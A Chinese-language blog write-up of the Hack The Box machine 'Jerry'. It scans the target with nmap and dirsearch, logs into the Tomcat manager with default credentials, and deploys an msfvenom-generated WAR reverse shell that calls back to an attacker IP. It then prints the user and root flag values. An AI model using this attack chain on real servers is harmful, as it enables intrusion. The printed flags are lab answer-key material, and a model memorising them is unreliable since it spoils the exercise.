banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

htb靶場 - Jerry

Jerry#

雖然 Jerry 是 Hack The Box 上較簡單的機器之一,但它是現實的,因為 Apache Tomcat 經常被暴露並配置了常見或弱密碼。

ip 地址:10.10.10.95

task1 遠程主機開放了什麼端口。

通過 nmap 進行掃描,識別端口開放情況

nmap -sV 10.10.10.95

da4c3b5c921fd9a70671aa0b1b00f1db_MD5

task2 遠程主機運行了什麼服務?

由 nmap 掃描結果可以看出,是 Apache Tomcat

task3 Web 伺服器上哪個相對路徑通向 Web 應用程序管理器?

5478701084fbb552cbabd751812c92df_MD5

dirsearch -u http://10.10.10.95:8080/

測試後發現是 /manager/html,目錄掃描就可以掃出來

task4 哪個有效的用戶名和密碼組合可用於認證進入 Tomcat Web 應用程序管理器?請以 username 的格式給出答案。

admin/admin 登錄後

d3c8f4025796da09d722d91f845607d9_MD5

tomcat

39b52d9b28c7ba54ef37f2fced070be7_MD5

task5 什麼類型的文件可以部署到伺服器上?

當然是 war 包。

task 提交 user 的 flag

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=3155 -f war > shell.war

5b8913f60909dda3532be9476d04c2f5_MD5

2f30b2facbf7dbad8655979755197b52_MD5

95d56514dd6a0987200fea815c4a05dd_MD5

點擊 http://10.10.10.95:8080/shell/

反彈會 shell

b95a9f57e33b090d532c7968b6ce9bff_MD5

ce04826dbd941201445f1dd44d6a09c1_MD5

這種文件要怎麼讀取?

type *.txt

2a22782298cb0a82d00329420159c7e3_MD5

有兩個 flag

user flag:7004dbcef0f854e0fb401875f26ebd00

task 提交 root 的 flag

04a8b36e1545a455393d067e772fe90e


http://10.10.10.95:8080/manager/status

以為有 ajp 任意文件讀取呢

ea0715aea55735617cc9f44aaac072f2_MD5

216733999b175aa05288747da68eb80c_MD5

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。